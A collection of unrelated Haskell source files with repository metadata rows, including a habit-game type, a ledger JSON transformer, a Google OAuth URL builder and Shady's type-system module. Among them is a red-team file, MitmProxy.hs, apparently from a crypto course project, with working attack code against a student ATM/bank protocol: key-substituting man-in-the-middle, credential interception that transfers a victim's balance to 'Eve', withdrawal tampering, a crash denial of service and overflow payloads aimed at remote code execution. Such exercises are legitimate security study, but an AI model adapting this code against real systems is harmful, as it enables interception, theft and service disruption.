| brendanhay/gogol | gogol-bigquery/gen/Network/Google/Resource/BigQuery/Jobs/Insert.hs | mpl-2.0 | 4,082 | 0 | 24 | 1,113 | 598 | 338 | 260 | 86 | 1 |
{-
Habit of Fate, a game to incentivize habit formation.
Copyright (C) 2019 Gregory Crosswhite
This program is free software: you can redistribute it and/or modify
it under version 3 of the terms of the GNU Affero General Public License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
-}
{-# LANGUAGE AutoDeriveTypeable #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE UnicodeSyntax #-}
module HabitOfFate.Data.Deed where
import HabitOfFate.Prelude
import Data.Aeson (FromJSON(..), ToJSON(..), (.:), object, withObject)
import Data.Time.LocalTime
import HabitOfFate.Data.Markdown
import HabitOfFate.Data.SuccessOrFailureResult
import HabitOfFate.JSON
data Deed = Deed SuccessOrFailureResult Markdown LocalTime deriving (Eq,Ord,Read,Show)
instance ToJSON Deed where
toJSON (Deed result text when) = object
[ "result" .== result
, "story" .== toJSON text
, "when" .== when
]
instance FromJSON Deed where
parseJSON = withObject "deed must be object-shaped" $ \o →
Deed
<$> (o .: "result")
<*> (o .: "story")
<*> (o .: "when")
| gcross/habit-of-fate | sources/library/HabitOfFate/Data/Deed.hs | agpl-3.0 | 1,527 | 0 | 12 | 297 | 216 | 126 | 90 | 24 | 0 |
-- Hackage dependencies: asn1-encoding cryptonite network
{-# LANGUAGE NoMonomorphismRestriction, OverloadedStrings #-}
import Control.Applicative
import Control.Concurrent
import Control.Monad
import Crypto.Cipher.AES
import Crypto.Cipher.Types
import Crypto.Error
import Crypto.Hash.Algorithms
import Crypto.PubKey.RSA
import Crypto.PubKey.RSA.OAEP
import Crypto.Random
import Data.ASN1.BinaryEncoding
import Data.ASN1.BitArray
import Data.ASN1.Encoding
import Data.ASN1.Types
import Data.Char
import Data.IORef
import Data.Maybe
import Data.Word
import Network
import Network.Socket.ByteString
import System.Environment
import System.Exit
import System.Timeout
import System.IO
import qualified Data.ByteString as B
import qualified Data.ByteString.Char8
import qualified Data.ByteString.Lazy as L
readMaybe = fmap fst . listToMaybe . reads
lToStrict = B.concat . L.toChunks
stringToBS = B.pack . map (fromIntegral . ord)
bsToString = map (chr . fromIntegral) . B.unpack
showBS = stringToBS . show
port = PortNumber . fromIntegral
unPort (PortNumber x) = x
showHelp = do
name <- getProgName
putStrLn $ "Usage: " ++ name ++ " EXPLOIT_NAME ATM_PORT BANK_PORT"
putStrLn $ "EXPLOIT_NAME = LogTraffic | InterceptCreds | ArbitraryWithdrawal | ExceptionDOS | RCE"
exitFailure
main = withSocketsDo $ getArgs >>= main'
validatePorts atmPort bankPort = (atmPort', bankPort') where
atmPort' = maybe (error "Failed to parse atmPort") port $ readMaybe atmPort
bankPort' = maybe (error "Failed to parse bankPort") port $ readMaybe bankPort
main' ["LogTraffic", atmPort', bankPort'] = do
let (atmPort, bankPort) = validatePorts atmPort' bankPort'
listener <- listenOn atmPort
forever $ accept listener >>= forkIO . doMitm bankPort (passiveMitm (const (return ())))
main' ["InterceptCreds", atmPort', bankPort'] = do
let (atmPort, bankPort) = validatePorts atmPort' bankPort'
listener <- listenOn atmPort
forever $ accept listener >>= forkIO . doMitm bankPort (passiveMitm (interceptCreds bankPort))
main' ["ArbitraryWithdrawal", atmPort', bankPort'] = do
let (atmPort, bankPort) = validatePorts atmPort' bankPort'
listener <- listenOn atmPort
forever $ accept listener >>= forkIO . doMitm bankPort arbitraryWithdrawal
main' ["ExceptionDOS", atmPort', bankPort'] = do
let (_, bankPort) = validatePorts atmPort' bankPort'
bank <- connectTo "localhost" bankPort
exceptionDOS bank
return ()
main' ["RCE", atmPort', bankPort'] = do
let (_, bankPort) = validatePorts atmPort' bankPort'
handshakeExploit bankPort
main' (unrecognized:_) = do
putStrLn $ "Unrecognized exploit name: " ++ unrecognized
showHelp
main' _ = showHelp
dumbProxy atm bank logTo logFrom = loop where
bufferSize = 4096
loop = do
atmEOF <- hIsEOF atm
unless atmEOF $ do
B.hGetSome atm bufferSize >>= logTo >>= B.hPut bank
bankEOF <- hIsEOF bank
unless bankEOF $ do
B.hGetSome bank bufferSize >>= logFrom >>= B.hPut atm
loop
expect h s = do
s' <- B.hGetSome h (B.length s)
unless (s == s') $ error "expect: unexpected input"
decodeX509Pubkey :: L.ByteString -> Maybe PublicKey
decodeX509Pubkey x = case decodeASN1 BER x of
Right [Start Sequence,
Start Sequence, OID [1,2,840,113549,1,1,1], Null, End Sequence,
BitString (BitArray size s), End Sequence] ->
case decodeASN1 BER (L.fromChunks [s]) of
Right [Start Sequence, IntVal n, IntVal e, End Sequence] ->
Just (PublicKey (fromIntegral size `div` 8) n e)
_ -> Nothing
_ -> Nothing
encodeX509Pubkey :: PublicKey -> B.ByteString
encodeX509Pubkey (PublicKey size n e) = lToStrict $ encodeASN1 DER [Start Sequence,
Start Sequence, OID [1,2,840,113549,1,1,1], Null, End Sequence,
BitString (BitArray (fromIntegral size) s), End Sequence] where
s = lToStrict $ encodeASN1 DER [Start Sequence, IntVal n, IntVal e, End Sequence]
makeAES :: B.ByteString -> AES128
makeAES key = either (error . show) id . eitherCryptoError $ cipherInit key
mitmHandshake atm bank logTo logFrom = do
let bufferSize = 4096
let pubSizeBits = 3072
expect atm "DUMMY"
B.hPut bank "DUMMY"
bankPubRaw <- B.hGetSome bank bufferSize
(mitmPub, mitmPriv) <- generate (pubSizeBits `div` 8) 0x10001
let mitmDecrypt = (either (error . show) id) . decrypt Nothing (defaultOAEPParams SHA1) mitmPriv
let bankPub = maybe (error "Failed to decode bank pubkey") id $ decodeX509Pubkey (L.fromChunks [bankPubRaw])
--print bankPub
--print mitmPub
let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
let pubEncrypt = fmap (either (error . show) id) . encrypt (defaultOAEPParams SHA1) bankPub'
--print bankPub'
B.hPut atm (encodeX509Pubkey mitmPub)
encAES <- B.hGetSome atm bufferSize
let rawAES = mitmDecrypt encAES
putStr "Raw AES key: " >> print rawAES
let aes = makeAES rawAES
mitmAES <- pubEncrypt rawAES
B.hPutStr bank mitmAES -- memory corruption exploit possible here, see handshakeExploit
expect bank "DUMMY"
B.hPut atm "DUMMY"
encIV <- B.hGetSome atm bufferSize
let rawIV = mitmDecrypt encIV
putStr "Raw AES IV: " >> print rawIV
mitmIV <- pubEncrypt rawIV
B.hPutStr bank mitmIV
expect bank "DUMMY"
B.hPut atm "DUMMY"
encNonce <- B.hGetSome atm bufferSize
let Just aesIV = makeIV rawIV
let rawNonce = cfbDecrypt aes aesIV encNonce
putStr "Raw Initial Nonce: "
print rawNonce
let mitmNonce = cfbEncrypt aes aesIV rawNonce
B.hPutStr bank mitmNonce
expect bank "DUMMY"
B.hPut atm "DUMMY"
return (aes, aesIV)
{-
terminate called after throwing an instance of 'CryptoPP::InvalidArgument'
what(): RSA/OAEP-MGF1(SHA-1): ciphertext length of 5 doesn't match the required length of 384 for this key
Aborted
-}
exceptionDOS bank = do
let bufferSize = 4096
B.hPut bank "DUMMY"
bankPubRaw <- B.hGetSome bank bufferSize
B.hPutStr bank "Hello"
handshakeExploit bankPort = do
let bufferSize = 4096
let pubSizeBits = 3072
let sendPayload h payload k = do
B.hPut h "DUMMY"
bankPubRaw <- B.hGetSome h bufferSize
let Just bankPub = decodeX509Pubkey (L.fromChunks [bankPubRaw])
let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
--print bankPub'
putStr "Raw Payload: "
print $ payload
Right encPayload <- encrypt (defaultOAEPParams SHA1) bankPub' $ payload
putStr "Encrypted Payload: "
print $ encPayload
B.hPutStr h encPayload
k h bankPub'
{-
let continuation1 h bankPub' = do
Right encIV <- encrypt (defaultOAEPParams SHA1) bankPub' $ B.replicate 20 0x43
expect h "DUMMY"
B.hPutStr h encIV
B.hPutStr h "dummy"
expect h "DUMMY"
hClose h
putStrLn "end"
-}
let continuation2 h _ = do
hClose h
--let payload = B.replicate 342 0x41
let payload1 = "AAAABAAACAAADAAAEAAAFAAAGAAAHAAAIAAAJAAAKAAALAAAMAAANAAAOAAAPAAAQAAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAABBAABCAABDAABEAABFAABGAABHAABIAABJAABKAABLAABMAABNAABOAABPAABQAABRAABSAABTAABUAABVAABWAABXAABYAABZAACBAACCAACDAACEAACFAACGAACHAACIAACJAACKAACLAACMAACNAACOAACPAACQAACRAACSAACTAACUAACVAACWAACXAACYAACZAADBAADCAADDAADEAADFAADGAADHAADIAADJAADKA"
let payload2 = "ZZZZYZZZXZZZWZZZVZZZUZZZTZZZSZZZRZZZQZZZPZZZOZZZNZZZMZZZLZZZKZZZJZZZIZZZHZZZGZZZFZZZEZZZDZZZCZZZBZZZAZZYYZZYXZZYWZZYVZZYUZZYTZZYSZZYRZZYQZZYPZZYOZZYNZZYMZZYLZZYKZZYJZZYIZZYHZZYGZZYFZZYEZZYDZZYCZZYBZZYAZZXYZZXXZZXWZZXVZZXUZZXTZZXSZZXRZZXQZZXPZZXOZZXNZZXMZZXLZZXKZZXJZZXIZZXHZZXGZZXFZZXEZZXDZZXCZZXBZZXAZZWYZZWXZZWWZZWVZZWUZZWTZZWSZZWRZZWQZZWPZ"
--let payload = B.concat [B.replicate 36 0x41, B.replicate 4 1, B.replicate 302 0x42]
--let payload = payload'
bank1 <- connectTo "localhost" bankPort
sendPayload bank1 payload1 continuation2
bank2 <- connectTo "localhost" bankPort
sendPayload bank2 payload2 continuation2
data ActionType = Balance | Deposit | Login | Logout | Malformed | Transfer | Unknown | Withdraw
deriving (Enum, Eq, Show)
data Action = Action {
actUser :: B.ByteString,
actPin :: B.ByteString,
actOldNonce :: B.ByteString,
actNewNonce :: B.ByteString,
actCmd :: ActionType,
actAmount :: Int, -- cents
actRecipient :: B.ByteString
} deriving Show
deserializeAction :: B.ByteString -> Maybe Action
deserializeAction s = aux where
readB = readMaybe . bsToString
split' c = B.split (fromIntegral $ ord c)
aux = case map (split' ';') $ split' ':' s of
[[oldNonce, newNonce],[_],[user,pin,cmd,amount,recipient],[_]] -> do
cmd' <- readB cmd
return $ Action {
actUser = user,
actPin = pin,
actOldNonce = oldNonce,
actNewNonce = newNonce,
actCmd = toEnum cmd',
actAmount = maybe 0 id $ readB amount,
actRecipient = recipient
}
_ -> Nothing
serializeAction :: MonadRandom m => Action -> m B.ByteString
serializeAction (Action user pin oNonce nNonce cmd amt reci) = do
let actionBufferSize = 128
let cmd' = showBS $ fromEnum cmd
let amt' = showBS amt
let pad1Size = 1
let pad2Size = actionBufferSize - (sum (map B.length [oNonce, nNonce, user, pin, cmd', amt', reci]) + 8 + pad1Size)
--pad1 <- getRandomBytes pad1Size
--pad2 <- getRandomBytes pad2Size
let pad1 = B.replicate pad1Size 0x41
let pad2 = B.replicate pad2Size 0x42
return $ B.intercalate ":" [
B.intercalate ";" [oNonce, nNonce],
pad1,
B.intercalate ";" [user, pin, cmd', amt', reci],
pad2
]
-- unfortunately, this is checked for, and the server prints "These shouldn't happen." to stdout
replaceLogoutWithDeposit aes aesIv action ctxt = if actCmd action == Logout
then do
let action' = action { actCmd = Deposit, actAmount = 31337 }
ptxt' <- serializeAction action'
return $ cfbEncrypt aes aesIv ptxt'
else return ctxt
-- semicolons/colons in the nonce will mess things up, use constant A's for now
--makeNonce = getRandomBytes 16
makeNonce = return $ B.replicate 15 0x41
nextNonce :: MonadRandom m => Action -> m Action
nextNonce a@(Action {actNewNonce = oldNonce}) = do
newNonce <- makeNonce
return $ a { actOldNonce = oldNonce, actNewNonce = newNonce }
frontRunLogin bankPort username pin = do
let bufferSize = 4096
let pubSizeBits = 3072
putStrLn $ "Intercepted creds " ++ show username ++ ":" ++ show pin
putStrLn "Transferring everything to Eve"
bank <- connectTo "localhost" bankPort
hSetBuffering bank (BlockBuffering (Just bufferSize))
let putFlush x = B.hPut bank x >> hFlush bank
putFlush "DUMMY"
bankPubRaw <- B.hGetSome bank bufferSize
let bankPub = maybe (error "Failed to decode bank pubkey") id $ decodeX509Pubkey (L.fromChunks [bankPubRaw])
let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
let pubEncrypt = fmap (either (error . show) id) . encrypt (defaultOAEPParams SHA1) bankPub'
rawAES <- getRandomBytes 16
let aes = makeAES rawAES
mitmAES <- pubEncrypt rawAES
putFlush mitmAES
expect bank "DUMMY"
rawIV <- getRandomBytes 16
mitmIV <- pubEncrypt rawIV
putFlush mitmIV
expect bank "DUMMY"
let Just aesIV = makeIV rawIV
rawNonce <- makeNonce
let mitmNonce = cfbEncrypt aes aesIV rawNonce
putFlush mitmNonce
expect bank "DUMMY"
let enc = cfbEncrypt aes aesIV
let dec = cfbDecrypt aes aesIV
let sendAction a = do
--putStr "Sending: " >> print a
a' <- serializeAction a
--print a'
let a'' = enc a'
--print a''
putFlush a''
let getAction k = do
tmp <- B.hGetSome bank bufferSize
--print tmp
let tmp' = dec tmp
--print tmp'
let r = deserializeAction tmp'
--print r
case r of
Nothing -> return ()
Just r' -> k r'
let updateAction a f = fmap f $ nextNonce a
newNonce <- makeNonce
let a1 = Action username pin rawNonce newNonce Login 0 ""
sendAction a1
getAction $ \r1 -> do
a2 <- updateAction r1 $ (\a -> a {actCmd = Balance})
sendAction a2
getAction $ \r2 -> do
let f = (\a -> a {actCmd = Transfer, actRecipient = "Eve", actAmount = actAmount r2})
a3 <- updateAction r2 f
sendAction a3
getAction $ \r3 -> do
a4 <- updateAction r3 $ (\a -> a {actCmd = Logout})
sendAction a4
getAction $ \r4 -> if actCmd r4 == Malformed
then putStrLn "Transfer failed"
else putStrLn "Transfer successful"
return ()
interceptCreds bankPort a = when (actCmd a == Login && B.length (actPin a) > 0 && actUser a /= "Eve") $
frontRunLogin bankPort (actUser a) (actPin a)
passiveMitm hook atm bank logTo logFrom aes aesIv = dumbProxy atm bank (wrap logTo) (wrap logFrom) where
wrap log ctxt = do
let ptxt = cfbDecrypt (aes :: AES128) aesIv ctxt
let action = deserializeAction ptxt
case deserializeAction ptxt of
Just action -> do
log (showBS action)
--replaceLogoutWithDeposit aes aesIv action ctxt
timeout (5*10^6) $ hook action
return ctxt
_ -> do
log ptxt
return ctxt
arbitraryWithdrawal atm bank logTo logFrom aes aesIv = aux where
decrypt = deserializeAction . cfbDecrypt (aes :: AES128) aesIv
encrypt = fmap (cfbEncrypt aes aesIv) . serializeAction
aux = do
intercept <- newIORef False
let interceptTo ctxt = do
case decrypt ctxt of
Just a -> logTo (showBS a) >> if actCmd a == Withdraw
then do
writeIORef intercept True
encrypt $ a { actCmd = Balance }
else encrypt a
Nothing -> return ctxt
let interceptFrom ctxt = do
case decrypt ctxt of
Just a -> do
logFrom (showBS a)
i <- readIORef intercept
writeIORef intercept False
encrypt $ if i then a { actCmd = Withdraw } else a
Nothing -> return ctxt
dumbProxy atm bank interceptTo interceptFrom
doMitm bankPort k (atm, host, atmPort) = do
putStrLn $ "Received a connection from " ++ host ++ ":" ++ show atmPort
putStrLn $ "Forwarding to localhost:" ++ show (unPort bankPort)
bank <- connectTo "localhost" bankPort
let log p q s = (putStrLn $ show p ++ " -> " ++ show q ++ ": " ++ show s) >> return s
let logTo = log atmPort (unPort bankPort) :: B.ByteString -> IO B.ByteString
let logFrom = log (unPort bankPort) atmPort :: B.ByteString -> IO B.ByteString
(aes, aesIV) <- mitmHandshake atm bank logTo logFrom
k atm bank logTo logFrom aes aesIV
| aweinstock314/sheedb_weinsa_crypto2015_project | redteam/MitmProxy.hs | agpl-3.0 | 15,345 | 1 | 24 | 3,949 | 4,461 | 2,169 | 2,292 | -1 | -1 |
{-# LANGUAGE OverloadedStrings #-}
module Ledger.Application.Transformer.EntryOutput where
import Ledger.Application.Model.Entry (Entry, entryAmount, entryDescription,
entryId, entryTime, unEntryId)
import Data.Aeson (ToJSON, object, toJSON, (.=))
import Data.Text (Text)
import Data.Time (UTCTime)
data EntryOutput = EntryOutput
{ entryOutputAmount :: Double
, entryOutputDescription :: Text
, entryOutputId :: Integer
, entryOutputTime :: UTCTime
} deriving (Read, Show)
instance ToJSON EntryOutput where
toJSON entryOutput = object
[ "amount" .= entryOutputAmount entryOutput
, "description" .= entryOutputDescription entryOutput
, "id" .= entryOutputId entryOutput
, "time" .= entryOutputTime entryOutput
]
toEntryOutput :: Entry -> EntryOutput
toEntryOutput entry = EntryOutput
{ entryOutputAmount = fromRational (entryAmount entry)
, entryOutputDescription = entryDescription entry
, entryOutputId = unEntryId (entryId entry)
, entryOutputTime = entryTime entry
}
| asm-products/ledger-backend | library/Ledger/Application/Transformer/EntryOutput.hs | agpl-3.0 | 1,120 | 0 | 9 | 262 | 247 | 143 | 104 | 25 | 1 |
{-# LANGUAGE GeneralizedNewtypeDeriving, TemplateHaskell #-}
module Auth where
import Relude
import qualified Data.ByteString.Builder as BSB
import qualified Data.ByteString.Lazy as BSL
import qualified Data.Text.Encoding as T
import qualified Network.HTTP.Types.URI as W
-- Types -----------------------------------------------------------------------
-- ^ Some arbitrary token that is passed through Google's servers.
-- This is useful for preventing request forgeries.
newtype StateToken = StateToken { _stTokText ∷ Text }
newtype ClientID = ClientID { _clientIDText ∷ Text }
newtype Scope = Scope { _scopeText ∷ Text } -- May not contain spaces
type AuthScope = [Scope]
type EmailAddress = Text
data AccessType = Online | Offline
data PromptWhen = PromptAlways | PromptAuto
newtype URI = URI { _uriBS ∷ ByteString }
data AuthParams = AuthParams {
_clientID ∷ ClientID
, _redirectURI ∷ URI
, _stateTok ∷ StateToken
, _accessTy ∷ AccessType
, _scope ∷ AuthScope
, _promptWhen ∷ PromptWhen
, _emailAddress ∷ Maybe EmailAddress
, _includeGrantedScopes ∷ Bool
}
-- Instances -----------------------------------------------------------------
deriving instance Eq StateToken
deriving instance IsString StateToken
deriving instance IsString Scope
deriving instance Eq URI
deriving instance Ord URI
deriving instance Monoid URI
deriving instance IsString URI
instance Show URI where
show (URI u) = show u
makeLenses ''ClientID
makeLenses ''Scope
makeLenses ''AuthParams
makeLenses ''StateToken
makeLenses ''URI
-- Values ----------------------------------------------------------------------
authExample ∷ AuthParams
authExample = AuthParams
{ _clientID = ClientID "000000000000-00000000000000000000000000000000.apps.googleusercontent.com"
, _stateTok = ""
, _accessTy = Online
, _scope = ["https://www.googleapis.com/auth/calendar.readonly"]
, _promptWhen = PromptAuto
, _redirectURI = "https://oauth2-login-demo.appspot.com/code"
, _emailAddress = Nothing
, _includeGrantedScopes = True
}
authBase ∷ Text
authBase = "https://accounts.google.com/o/oauth2/auth"
authURL ∷ AuthParams → URI
authURL params = bsbToURI (bsbText authBase <> "?" <> queryParams)
where bsbToURI = URI . BSL.toStrict . BSB.toLazyByteString
bsbText = BSB.byteString . T.encodeUtf8
queryParams = W.renderQueryText False . fmtAuthParams $ params
-- https://developers.google.com/identity/protocols/OAuth2WebServer#formingtheurl
fmtAuthParams ∷ AuthParams → [(Text,Maybe Text)]
fmtAuthParams params = second Just <$> catMaybes results
where
results ∷ [Maybe(Text,Text)] =
[ ("response_type",) <$> Just "code"
, ("client_id",) <$> Just (params ^. clientID . clientIDText)
, ("redirect_uri",) <$> Just (T.decodeUtf8 $ params ^. redirectURI . uriBS)
, ("scope",) <$> Just (
fold . intersperse " " $
view scopeText <$> params ^. scope)
, ("state",) <$> Just (params ^. stateTok . stTokText)
, ("access_type",) <$> Just (
case params ^. accessTy of Online → "online"
Offline → "offline")
, ("approval_prompt",) <$> Just (
case params ^. promptWhen of PromptAuto → "auto"
PromptAlways → "force")
, ("login_hint",) <$> params ^. emailAddress
, ("include_granted_scopes",) <$> Just (
if params ^. includeGrantedScopes then "true" else "false")
]
| bsummer4/gcal | src/Auth.hs | agpl-3.0 | 3,628 | 0 | 15 | 789 | 795 | 456 | 339 | -1 | -1 |
{-# LANGUAGE GADTs, KindSignatures, FlexibleInstances, FlexibleInstances
, MultiParamTypeClasses, FunctionalDependencies
, UndecidableInstances, TypeOperators, ScopedTypeVariables
, FlexibleContexts, CPP
#-}
{-# LANGUAGE StandaloneDeriving #-}
{-# OPTIONS_GHC -Wall -fno-warn-orphans #-}
----------------------------------------------------------------------
-- |
-- Module : Shady.Language.Type
-- Copyright : (c) Conal Elliott 2009
-- License : GPLv3
--
-- Maintainer : conal@conal.net
-- Stability : experimental
--
-- Types
----------------------------------------------------------------------
module Shady.Language.Type
(
-- * Type values
ScalarT(..), VectorT(..), Type(..)
, TextureId, Sampler(..), sampler1, sampler2, sampler3, Sampler1, Sampler2, Sampler3
-- * Generating type values
, IsScalar(..), vectorT, HasType(..)
, typeOf, typeOf1, typeOf2, compatible, compatible1
, IsVec(..),checkVec, checkVec'
-- * Type equality
, (:=:)(..), ptyEq, vtyEq, tyEq
, (=:=), (===)
-- * Vector operations
-- , Vector(..)
-- * Convenient type synonyms
, R, R1, R2, R3, R4, B1, Pred1, Pred2
-- * Notions of equality
, SynEq(..),SynEq2(..)
-- * Pairing and unit
, PairF(..), (:#), UnitF(..)
-- * Re-export
, module TypeUnary.Vec
) where
import Control.Applicative (liftA2,Const(..))
import Data.Maybe (isJust)
import Data.Foldable (toList)
-- import Data.List (intercalate)
import Control.Monad.Instances ()
import Foreign.Storable
import Data.Typeable (Typeable)
import Text.PrettyPrint.Leijen
import Text.PrettyPrint.Leijen.PrettyPrec
import Text.PrettyPrint.Leijen.DocExpr
import TypeUnary.Vec
import Shady.Misc (FMod(..),R)
import Data.Proof.EQ
-- import Shady.Language.Equality
-- import Shady.MechanicsGL (GlTexture)
{--------------------------------------------------------------------
Type values
--------------------------------------------------------------------}
-- Primitive types
data ScalarT :: * -> * where
Bool :: ScalarT Bool
Int :: ScalarT Int
Float :: ScalarT Float
instance Show (ScalarT a) where
show Bool = "bool"
show Int = "int"
show Float = "float"
instance HasExprU ScalarT where
exprU Bool = var "bool"
exprU Int = var "int"
exprU Float = var "float"
instance Pretty (ScalarT a) where pretty = text . show
instance PrettyPrec (ScalarT a)
vshow :: Show a => a -> Expr
vshow = var . show
instance HasExpr (ScalarT a) where expr = vshow
data VectorT n a = VectorT (Nat n) (ScalarT a)
instance Show (VectorT n a) where
show (VectorT n t) = showVectorN (natToZ n) t
-- instance HasExpr a => HasExpr (VectorT a) where expr = expr1
-- instance HasExpr1 VectorT where expr1 = var . show
instance HasExprU (VectorT n) where exprU = expr
instance HasExpr (VectorT n a) where expr = var . show
showVectorN :: Integer -> ScalarT a -> String
showVectorN 1 p = show p
showVectorN n p = pref p ++ "vec" ++ show n
where
pref :: ScalarT b -> String
pref Bool = "b"
pref Int = "i"
pref Float = ""
instance Pretty (VectorT n a) where pretty = text . show
instance PrettyPrec (VectorT n a)
-- | Encoding of texture ids in values. I'm using 'Int' instead of
-- @GLuint@ here to avoid depending on OpenGL in this module & package.
type TextureId = Int
-- | An @n@-dimensional GLSL sampler.
data Sampler n =
Sampler { samplerDim :: Nat n, samplerTexture :: TextureId }
type Sampler1 = Sampler N1
type Sampler2 = Sampler N2
type Sampler3 = Sampler N3
instance Show (Sampler n) where
show (Sampler n tex) = "<Sampler "++show n++" "++show tex++">"
instance Pretty (Sampler n) where
pretty = text . show
instance PrettyPrec (Sampler n)
instance HasExpr (Sampler n)
sampler1 :: TextureId -> Sampler1
sampler1 = Sampler one -- or Sampler nat
sampler2 :: TextureId -> Sampler2
sampler2 = Sampler two -- or Sampler nat
sampler3 :: TextureId -> Sampler3
sampler3 = Sampler three -- or Sampler nat
-- | Extended types. Vector types, samplers, unit, pairing, and functions.
data Type :: * -> * where
VecT :: (IsNat n, IsScalar a {-, Storable (Vec n a) -}) =>
VectorT n a -> Type (Vec n a)
SamplerT :: IsNat n => Nat n -> Type (Sampler n)
UnitT :: Type ()
(:*:) :: (HasType a, HasType b {-, Show a, Show b -}) =>
Type a -> Type b -> Type (a , b)
(:->:) :: (HasType a, HasType b {-, Show a, Show b -}) =>
Type a -> Type b -> Type (a -> b)
instance HasExpr (Type t) where
expr (VecT t) = expr t
expr (SamplerT n) = var $ "sampler" ++ show n ++ "D"
expr UnitT = var "()"
expr (a :*: b) = op InfixR 1 ":*" (expr a) (expr b)
expr (a :->: b) = op InfixR 0 "->" (expr a) (expr b)
instance HasExprU Type where exprU = expr
instance PrettyPrec (Type t) where prettyPrec = prettyExpr
instance Pretty (Type t) where pretty = prettyPrec 0
instance Show (Type t) where show = show . expr
{--------------------------------------------------------------------
Generating type values
--------------------------------------------------------------------}
-- EXPERIMENTAL: Typeable constraints
-- | Has scalar type
class (Storable a, Typeable a, PrettyPrec a) => IsScalar a where scalarT :: ScalarT a
-- The Storable and Show prereqs simplify explicit constraints at uses.
instance IsScalar Bool where scalarT = Bool
instance IsScalar Int where scalarT = Int
instance IsScalar Float where scalarT = Float
vectorT :: (IsNat n, IsScalar a) => VectorT n a
vectorT = VectorT nat scalarT
-- | Known types
class HasExpr t => HasType t where typeT :: Type t
-- Sorry about that Show constraint. It's ultimately motivated by
-- the constant folding optimization and from there creeps into *lots* of contexts.
-- The Show t is experimental. If it works out, remove Show from a lot of contexts.
instance (IsNat n, IsScalar a {-, Storable (Vec n a)-}) =>
HasType (Vec n a) where
typeT = VecT vectorT
instance HasType () where typeT = UnitT
instance (HasType a, HasType b {-, Show a, Show b -}) =>
HasType (a, b) where typeT = typeT :*: typeT
instance (HasType a, HasType b {-, Show a, Show b -}) =>
HasType (a->b) where typeT = typeT :->: typeT
instance IsNat n => HasType (Sampler n) where
typeT = SamplerT nat
-- | Reify a type
typeOf :: HasType a => a -> Type a
typeOf = const typeT
-- | Reify a type argument
typeOf1 :: HasType a => f a -> Type a
typeOf1 = const typeT
-- | Reify a type argument's argument
typeOf2 :: HasType a => g (f a) -> Type a
typeOf2 = const typeT
-- | Demonstration that a type argument is a vector type.
data IsVec :: * -> * where
IsVec :: (IsNat n, IsScalar a) => IsVec (Vec n a)
-- | Check for a vector type
checkVec :: forall t. HasType t => Maybe (IsVec t)
checkVec =
case (typeT :: Type t) of
VecT _ -> Just IsVec
_ -> Nothing
-- | Convenient wrapper around 'checkVec'. Ignores argument.
checkVec' :: forall f t. HasType t => f t -> Maybe (IsVec t)
checkVec' = const checkVec
{--------------------------------------------------------------------
Type equality
--------------------------------------------------------------------}
-- | Try to prove equality of primitive types
ptyEq :: ScalarT a -> ScalarT b -> Maybe (a :=: b)
ptyEq Bool Bool = Just Refl
ptyEq Int Int = Just Refl
ptyEq Float Float = Just Refl
ptyEq _ _ = Nothing
-- | Try to prove equality of types
vtyEq :: VectorT m a -> VectorT n b -> Maybe (Vec m a :=: Vec n b)
vtyEq (VectorT m a) (VectorT n b) = liftA2 liftEq2 (m `natEq` n) (a `ptyEq` b)
-- | Try to prove equality of types
tyEq :: Type c -> Type c' -> Maybe (c :=: c')
tyEq (VecT a) (VecT a') = vtyEq a a'
tyEq (SamplerT n) (SamplerT n') = fmap liftEq (natEq n n')
tyEq UnitT UnitT = Just Refl
tyEq (a :*: b) (a' :*: b') = liftA2 liftEq2 (tyEq a a') (tyEq b b')
tyEq (a :->: b) (a' :->: b') = liftA2 liftEq2 (tyEq a a') (tyEq b b')
tyEq _ _ = Nothing
-- TODO: Maybe define a class & method for the various typed equality
-- functions, with a nice infix method name.
-- | Yields 'Just' 'Refl' if type-compatible /and/ equal. Otherwise 'Nothing'.
(=:=) :: forall f a b. (HasType a, HasType b, SynEq f) =>
f a -> f b -> Maybe (a :=: b)
fa =:= fb =
case typeOf1 fa `tyEq` typeOf1 fb of
Just Refl -> if fa =-= fb then Just Refl else Nothing
Nothing -> Nothing
-- | Same type and syntactically equal
(===) :: forall f a b. (HasType a, HasType b, SynEq f) =>
f a -> f b -> Bool
fa === fb = isJust (fa =:= fb)
-- | Do two values have the same type. If so, return a proof.
compatible :: (HasType a, HasType b) => a -> b -> Maybe (a :=: b)
x `compatible` y = typeOf x `tyEq` typeOf y
-- | Do two values have the same argument type. If so, return a proof.
compatible1 :: (HasType a, HasType b) => f a -> g b -> Maybe (a :=: b)
x `compatible1` y = typeOf1 x `tyEq` typeOf1 y
{--------------------------------------------------------------------
Convenient type synonyms
--------------------------------------------------------------------}
-- TODO: Maybe move R to Misc and use in defining EyePos in MechanicsGL
-- | Convenient short-hand
type R1 = Vec1 R
-- | Convenient short-hand
type R2 = Vec2 R
-- | Convenient short-hand
type R3 = Vec3 R
-- | Convenient short-hand
type R4 = Vec4 R
-- | Single boolean
type B1 = Vec1 Bool
-- | Unary predicate
type Pred1 a = a -> B1
-- | Binary predicate
type Pred2 a = a -> Pred1 a
{--------------------------------------------------------------------
Notions of equality
--------------------------------------------------------------------}
infix 4 =-=, =--=
-- | Syntactic equality. Requires same argument type.
class SynEq f where
(=-=) :: HasType c => f c -> f c -> Bool
instance Eq x => SynEq (Const x) where (=-=) = (==)
-- | Higher-order variant of 'SynEq'. Can be defined via '(=-=)', or vice versa.
class SynEq2 f where
(=--=) :: (SynEq v, HasType c) => f v c -> f v c -> Bool
deriving instance Eq a => Eq (Const a b)
{--------------------------------------------------------------------
Pairing
--------------------------------------------------------------------}
infixr 1 #, :#
class PairF f where
(#) :: (HasType a, HasType b {-, Show a, Show b -}) =>
f a -> f b -> f (a :# b)
-- | Syntactic alternative for pairing. Convenient for right-associative
-- infix use.
type a :# b = (a,b)
class UnitF f where unit :: f ()
{--------------------------------------------------------------------
Orphans
--------------------------------------------------------------------}
